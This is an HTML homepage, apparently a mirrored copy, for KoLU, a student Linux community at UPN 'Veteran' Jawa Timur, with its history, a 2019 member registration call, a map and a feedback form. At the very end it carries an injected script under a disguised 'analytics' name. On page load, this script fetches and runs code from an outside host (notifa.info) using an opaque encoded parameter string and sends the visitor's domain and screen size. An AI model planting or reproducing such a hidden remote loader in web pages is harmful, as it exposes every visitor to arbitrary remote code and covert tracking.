<!DOCTYPE html>
<html lang="en-US" class="no-js">

<!-- Mirrored from themesdemo.fastcomet.com/Plushiness/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 10 Sep 2019 02:02:16 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>

	<script language='JavaScript'>
var txt="|Pendaftaran Anggota KoLu |";
var speed=300;
var refresh=null;
function action() { document.title=txt;
txt=txt.substring(1,txt.length)+txt.charAt(0);
refresh=setTimeout("action()",speed);}action();
</script>

<!-- =================================Back to TOP=========================== -->

<script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
<script type="text/javascript">
    var $backToTop = $(".backTop");
    $backToTop.hide();
    $(window).on('scroll', function() {
      if ($(this).scrollTop() > 100) {
        $backToTop.fadeIn();
      } else {
        $backToTop.fadeOut();
      }
    });

    $backToTop.on('click', function(e) {
      $("html, body").animate({scrollTop: 0}, 500);
    });
</script>
<!-- ======================================================================= -->


<!-- =====================================MAPS=================================== -->
<meta charset="utf-8">
    <meta name="viewport" content="width=device-width">
    <title>Tutorial Google Map - Petani Kode</title>
  
    <!-- Menyisipkan library Google Maps -->
    <script src="http://maps.googleapis.com/maps/api/js"></script>

    <script>
        // fungsi initialize untuk mempersiapkan peta
        function initialize() {
        var propertiPeta = {
            center:new google.maps.LatLng(-7.3334706,112.7867287),
            zoom:17,
            mapTypeId:google.maps.MapTypeId.ROADMAP
        };
        
        var peta = new google.maps.Map(document.getElementById("googleMap"), propertiPeta);
        }

        // event jendela di-load  
        google.maps.event.addDomListener(window, 'load', initialize);
    </script>
<!-- ============================================================================ -->

	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script>
	<link rel="icon" type="image/png" href="images/logo-kolu.png" />
<!-- <title>Blog &#8211; Plushiness</title> -->
<link rel="stylesheet" type="text/css" href="tabel/tabel.css">
<link rel="alternate" type="application/rss+xml" title="Plushiness &raquo; Feed" href="feed/index.html" />
<link rel="alternate" type="application/rss+xml" title="Plushiness &raquo; Comments Feed" href="comments/feed/index.html" />
<link rel='stylesheet' id='this-style-css'  href='css/style.css' type='text/css' media='all' />
<link rel='stylesheet' id='sitemush-fonts-css'  href='https://fonts.googleapis.com/css?family=Merriweather%3A400%2C700%2C900%2C400italic%2C700italic%2C900italic%7CMontserrat%3A400%2C700%7CInconsolata%3A400&amp;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='genericons-css'  href='css/genericons.css' type='text/css' media='all' />
<link rel='stylesheet' id='sitemush-style-css'  href='css/1-style.css' type='text/css' media='all' />



<!--========================= Komentar ======================================-->
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" type="text/css" href="komentar/fonts/font-awesome-4.7.0/css/font-awesome.min.css">
	<link rel="stylesheet" type="text/css" href="komentar/css/main.css">
<!--=========================================================================-->
<!--[if lt IE 10]>
<link rel='stylesheet' id='sitemush-ie-css'  href='css/ie.css' type='text/css' media='all' />
<![endif]-->
<!--[if lt IE 9]>
<link rel='stylesheet' id='sitemush-ie8-css'  href='css/ie8.css' type='text/css' media='all' />
<![endif]-->
<!--[if lt IE 8]>
<link rel='stylesheet' id='sitemush-ie7-css'  href='css/ie7.css' type='text/css' media='all' />
<![endif]-->
<link rel='stylesheet' id='mpce-venobox-css-css'  href='css/venobox.css' type='text/css' media='all' />
<link rel='stylesheet' id='mpce-theme-css'  href='css/theme.css' type='text/css' media='all' />
<style id='mpce-theme-inline-css' type='text/css'>
.sm-row-fixed-width{max-width:1170px;}
</style>
<link rel='stylesheet' id='mpce-bootstrap-grid-css'  href='css/bootstrap-grid.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mpce-font-awesome-css'  href='css/font-awesome.min.css' type='text/css' media='all' />
<script type='text/javascript' src='js/jquery.js'></script>
<script type='text/javascript' src='js/jquery-migrate.min.js'></script>
<script type='text/javascript' src='js/header.js'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='js/html5.js'></script>
<![endif]-->
<script type='text/javascript' src='js/venobox.min.js'></script>
<link rel='https://api.w.org/' href='szp-json/index.html' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="xmlrpc0db0.html?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="site-inc/wlwmanifest.html" /> 
<meta name="generator" content="SitePad" />
		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		</head>

<body class="blog hfeed">
<div id="page" class="site container-fluid">
	<div class="site-inner">
			
		
		<header id="masthead" class="site-header" role="banner"><div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right header">
<div class="sm-span12 smue-clmn  sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-ce-icon-obj smue-ce-icon-size-extra-large  smue-ce-icon-align-center">
<div style="background-color:transparent; border-color: transparent;" class="smue-ce"><span style="color:rgb(255, 255, 255)"><a href="login/login.php"><img src="images/logo-kolu.png">
</a></span></div>
</div>
</div>
</div>
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right site_title">
<div class="smue-szp_site_title smue-ce-child-detector"><div class="site-title-container"  ><a href="index.html" ></a></div></div>
</div>
</div>
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-text-obj tag_line">
<p style="text-align: center;">Design by <a href="#">KoLU</a></p>
</div>
</div>
</div>
</div>
</div>
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right hexagon_header">
</div>
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-span12 smue-clmn  sme-dsbl-margin-left sme-dsbl-margin-right">
<center><div class="smue-szp_primary_nav smue-ce-child-detector "><i id="menu-toggle" aria-expanded="false">
	<img src="images/nav.png"> </i>  
	<button class="menu-toggle" id="menu-toggle" aria-expanded="false" aria-controls="site-navigation social-navigation">Menu</button>
	<div id="site-header-menu" class="site-header-menu">
		<nav id="site-navigation" class="main-navigation" role="navigation" aria-label="Primary Menu">
			<div class="menu-header-menu-container">
			<ul id="menu-header-menu" class="primary-menu">
			<li id="menu-item-8" class="home menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-8" style="  " >
				<a href="index.html" style="  " >Home</a>
			</li>
			<li id="menu-item-8" class="home menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-8" style="  " >
				<a href="https://www.kolu.web.id/blog/" style="  " >Blog</a>
			</li>
			<li id="menu-item-8" class="home menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-8" style="  " >
				<a href="post.php" style="  " >Post</a>
			</li>
			<li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-9" style="  " >
				<a href="form/fungsi.php" style="  " >Pendaftaran</a>
			</li>
			<li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9" style="  " >
				<a href="anggotabaru.php">Anggota Baru</a>
			</li>
			<li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9" style="  " >
				<a href="formregister">Registrasi Devisi</a>
			</li>
			</ul>
			</div>
		</nav><!-- .main-navigation -->
	</div><!-- .site-header-menu --></div>
</center>
	<style>@media screen and (min-width:768px) { .site-header-menu .main-navigation .primary-menu > li {} .site-header-menu .main-navigation a{} .site-header-menu .main-navigation .sub-menu a {} .site-header-menu .main-navigation .current-menu-item > a {} .site-header-menu .main-navigation li:hover > a {} .site-header-menu .main-navigation .primary-menu > .menu-item-has-children > a::after {} .site-header-menu .main-navigation ul ul .menu-item-has-children > a::after {} } @media screen and (max-width:767px) { .site-header-menu .main-navigation a, .site-header-menu .main-navigation .sub-menu a {} i.responsive_bar{} .site-header-menu .main-navigation li.current-menu-item > a {} .site-header-menu .main-navigation a:hover, .site-header-menu .main-navigation .primary-menu li a:hover {} .site-header-menu {} .dropdown-toggle:after {} }</style><script type="text/javascript">
		
		jQuery(document).ready(function(){
			
			var maxwidth = 0;
			var menu_len = jQuery("div.smue-szp_primary_nav").length; // number of menus added
			
			jQuery( "ul.primary-menu > li" ).each(function() {
				maxwidth += jQuery(this).width(); // Find total width
			});
			
			if(menu_len){
				maxwidth /= menu_len; // Divide the total width with number of menus
			}
			
			jQuery( ".smue-szp_primary_nav" ).css( "maxWidth", maxwidth + "px" ); // Assign the maxWidth
		});		
		</script>
</div>
</div>

		</header>

		<script language="javascript" type="text/javascript">
			var cur_page_data = {pageid:"5", pagename:"home"};
			var cur_themes_url = "http://demos.sitemush.com/Plushiness/site-data/themes";
		</script>
		<div id="content" class="site-content">

<div id="primary" class="content-area">
	<main id="main" class="site-main" role="main">
		
<article id="post-5" class="post-5 page type-page status-publish hentry">

	<div class="entry-content">
		<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right service_row">
<div class="sm-span12 smue-clmn  sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right services">
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-ce-icon-obj hexagon smue-ce-icon-shape-none  smue-ce-icon-size-large  smue-ce-icon-align-center  sme-dsbl-padding-left sme-dsbl-padding-right sme-dsbl-margin-top sme-dsbl-margin-bottom" style="">
<div style="background-color:transparent; border-color: transparent;" class="smue-ce-icon-bg"><img src="images/team.png"></div>
</div>
</div>
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-code-obj service_content">
<h2 style="text-align: center;">KOLU</h2>
<h6 style="text-align: center;">Komunitas Linux UPN "Veteran" Jawa Timur</h6>
<p style="text-align: center;">KoLU diresmikan pada 03 Januari 2007 yaitu pada rapat koordinasi pertama yang diadakan diruang sekretariat HIMATIFA dan langsung diketuai oleh Moch. Ginanjar dengan wakil Megawati. Sebelum KoLU berdiri, berdirilah KSL (Kelompok Study Linux) yang didirikan oleh HIMATIFA (Himpunan Mahasiswa Teknik Informatika) 2005/2006, tapi karena belum adanya sekretariat KSL dan kurangnya sumber daya manusia yang berminat terhadap Linux maka KSL tidak berjalan dengan semestinya.</p>
</div>
</div>
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-button-obj smue-text-align-center"><a href="https://www.kolu.web.id/about-2/" target="_self" class="smue-btn smue-btn-size-large btn_default">Telusuri Lebih Lengkap</a></div>
</div>
</div>
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right services">
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-ce-icon-obj hexagon smue-ce-icon-shape-none  smue-ce-icon-size-large  smue-ce-icon-align-center  sme-dsbl-padding-left sme-dsbl-padding-right sme-dsbl-margin-top sme-dsbl-margin-bottom" style="">
<div style="background-color:transparent; border-color: transparent;" class="smue-ce-icon-bg"><img src="images/value.png"></div>
</div>
</div>
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-code-obj service_content">
<h2 style="text-align: center;">Pendaftaran</h2>
<h6 style="text-align: center;">Penerimaan anggota baru Komunitas KOLU 2019</h6>
<p style="text-align: center;">Dalam sebuah komunitas setiap periode akan selalu membuka untuk anggota baru dengan mendaftarkan dirinya ketempat yang telah disediakan oleh pihak yang bersangkutan. Dan dalam pendaftaran tersebut akan terdapat sebuah form untuk memberikan data-data yang valid. <br>
untuk mendaftar silahkan submit dibawah ini. Terimakasih</p>
</div>
</div>
<div class="sm-span12 smue-clmn sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-button-obj smue-text-align-center"><a href="form/fungsi.php" target="_self" class="smue-btn smue-btn-size-large btn_default">Daftar Sekarang</a></div>
</div>
</div>
</div>
</div>

<div id="googleMap" style="width:100%;height:380px;"></div> 

	</div><!-- .entry-content

</article> #post-## -->

	</main><!-- .site-main -->
</div><!-- .content-area -->


		</div><!-- .site-content -->
		
		
		<footer id="colophon" class="site-footer" role="contentinfo"><div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="sm-span12 smue-clmn  sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-ce-icon-obj hexagon_alt smue-ce-icon-shape-none  smue-ce-icon-size-large  smue-ce-icon-align-center  sme-dsbl-padding-left sme-dsbl-padding-right sme-dsbl-margin-top sme-dsbl-margin-bottom" style="">
<div style="background-color:transparent; border-color: transparent;" class="backTop"><img src="images/top.png"></div>
</div>


			<form class="contact1-form validate-form" method="post" action="insertkomen.php">
				<span class="contact1-form-title">
					Kritik dan Saran
				</span>

				<div class="wrap-input1 validate-input" data-validate = "Name is required">
					<input class="input1" type="text" name="nama" placeholder="Name">
					<span class="shadow-input1"></span>
				</div>

				<div class="wrap-input1 validate-input" data-validate = "Valid email is required: ex@abc.xyz">
					<input class="input1" type="text" name="email" placeholder="Email">
					<span class="shadow-input1"></span>
				</div>

				<div class="wrap-input1 validate-input" data-validate = "Message is required">
					<textarea class="input1" name="komentar" placeholder="Message"></textarea>
					<span class="shadow-input1"></span>
				</div>

				<div class="container-contact1-form-btn">
					<br>
					<button class="contact1-form-btn">
						<span>
							Send Email
							<i class="fa fa-long-arrow-right" aria-hidden="true"></i>
						</span>
					</button>
				</div>
			</form>

</div>
</div>
<div class="sm-row-fluid smue-row sme-dsbl-margin-left sme-dsbl-margin-right footer">
<div class="sm-span12 smue-clmn  sme-dsbl-margin-left sme-dsbl-margin-right">
<div class="smue-code-obj copyright">
<p style="text-align: center;">Design Theme by Kolu Divisi Web</p>
</div>
</div>
</div>

		</footer><!-- .site-footer -->	</div><!-- .site-inner -->
</div><!-- .site -->

<script type='text/javascript' src='js/skip-link-focus-fix.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var screenReaderText = {"expand":"expand child menu","collapse":"collapse child menu"};
/* ]]> */
</script>
<script type='text/javascript' src='js/functions.js'></script>
<script type='text/javascript' src='js/szp-embed.min.js'></script>
<script type='text/javascript' src='js/jquery.waypoints.min.js'></script>
<script type='text/javascript' src='js/mp-waypoint-animations.js'></script>
<style id="smue-ce-private-styles" data-posts="" type="text/css"></style><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2II0eYwDqoSCZIRUUaHWY366xw8y0lbWvZWsLy8DvWauyx1%2fW4Dxg4I9yzTcxp4Zbm9qO%2fHqm5%2borpdS3jfTgFMn%2b4mo8q7TiphrGmhtIFsbjivJBN2%2blBuRLDnRu9lkP8WE9nsUoybDwzrqwi72EuSmz6qwQHwJLbf9TyxggsxiWET8x1PiZzY4eKlgZoOVjt7AJbZzNn7cd%2bPMe%2fuVdIS4ctynN%2f9BUgg1KBy6t3Siwgb39Z05EQaIgfZYeHyNvqdnuK7FJ0%2bGrkTLxG88yxnM9Y2Rmo2oRVWfhElAVkvtt0V%2fYoIk%2brFXkkYhtXKhOL57UScVwO92mMxlU6CxLsLOaEyB2ySHdcgRkIc%2fj0jDaVEXVReJlQVVIyf9fuKQq3yaWS3JUC%2f81o1cYmAySYaeHUMOZjobs7xW49xW7AfopNYwn%2bDj1TAYr%2fS0fyWmnH4il40waKvdyj9hOQ1SqfmFCWhrGj%2f2hOMbY51pePS7z%2bj9yarx25yeFyuWQcPDxnNLZxMg%2bsgKoKgL%2f3QwU5iDc7yiYMGJW" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from themesdemo.fastcomet.com/Plushiness/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 10 Sep 2019 02:06:34 GMT -->
</html>